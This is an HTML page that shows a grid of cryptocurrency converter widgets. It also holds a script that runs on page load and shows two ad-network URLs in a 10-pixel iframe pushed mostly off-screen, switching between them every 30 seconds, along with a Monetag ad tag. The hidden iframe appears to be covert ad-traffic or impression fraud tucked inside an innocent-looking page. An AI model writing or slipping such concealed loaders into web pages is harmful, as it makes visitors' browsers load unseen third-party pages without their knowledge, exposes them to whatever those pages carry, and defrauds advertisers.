<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
      #popupIframe {
        display: none;
        position: fixed;
        height: 10px;
        width: 10px;
        top: 1px;
        left: 0px;
        transform: translate(-50%, -50%);
        border: none;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        background-color: #fff;
        transition: transform 0.3s ease-in-out;
      }
      #popupIframe.active {
        transform: translate(-50%, -50%) scale(1.05);
      }
      #iframe {
        width: 100%;
        height: 100%;
        border: none;
      }
    </style>

</head>
<body>
    <div class="m-3 columns is-multiline" id="main"></div>
<script src="https://cdn.jsdelivr.net/gh/dejurin/crypto-converter-widget/dist/latest.min.js" async></script>


<script>
    const colors = [
  "#40E0D0",
  "#000080",
  "#f7347a",
  "#0e2f44",
  "#6897bb",
  "#696969",
  "#cbcba9",
  "#5ac18e",
  "#FFBF00",
  "#800000",
  "#800080",
  "#0000FF",
  "#000080",
  "#008080",
  "#6495ED",
  "#40E0D0",
  "#DE3163",
  "#FF7F50"
];

const crypto = [
  "bitcoin",
  "ethereum",
  "xrp",
  "tether",
  "bitcoin-cash",
  "litecoin",
  "chainlink",
  "cardano",
  "polkadot",
  "binance-coin",
  "stellar",
  "usd-coin",
  "bitcoin-sv",
  "eos",
  "monero",
  "wrapped-bitcoin",
  "tron",
  "nem"
];

for (color in colors) {
  const div = document.createElement("div");
  const el = document.createElement("crypto-converter-widget");
  div.className = "column is-4";
  el.setAttribute("background-color", colors[color]);
  el.setAttribute("live", true);
  el.setAttribute("shadow", true);
  el.setAttribute("symbol", true);
  el.setAttribute("crypto", crypto[color]);

  div.appendChild(el);
  document.getElementById("main").appendChild(div);
}

</script>
<div id="popupIframe">
  <iframe id="iframe" frameborder="0"></iframe>
</div>
<script>
  var urls = [


    'https://shulugoo.net/4/7031709',
    'https://nauwheer.net/4/7031732',
  

  ];
  var currentIndex = 0;
  var displayTimer;
  function startDisplay() {
    var popupIframe = document.getElementById('popupIframe');
    popupIframe.style.display = 'block';
    popupIframe.classList.add('active');
    loadNextUrl();
    displayTimer = setInterval(function() {
      loadNextUrl();
    }, 30000);
  }
  function loadNextUrl() {
    if (currentIndex < urls.length) {
      var iframe = document.getElementById('iframe');
      iframe.src = urls[currentIndex];
      currentIndex++;
    } else {
      var popupIframe = document.getElementById('popupIframe');
      popupIframe.classList.remove('active');
      setTimeout(function() {
        popupIframe.style.display = 'none';
        clearInterval(displayTimer);
      }, 300);
    }
  }
  startDisplay();
</script>
<script async='async' data-cfasync='false' data-zone='40666' src='https://alwingulla.com/88/tag.min.js'/>


<meta content='94db02369c427193cae215efe71174dd' name='monetag'/>
</body>
</html>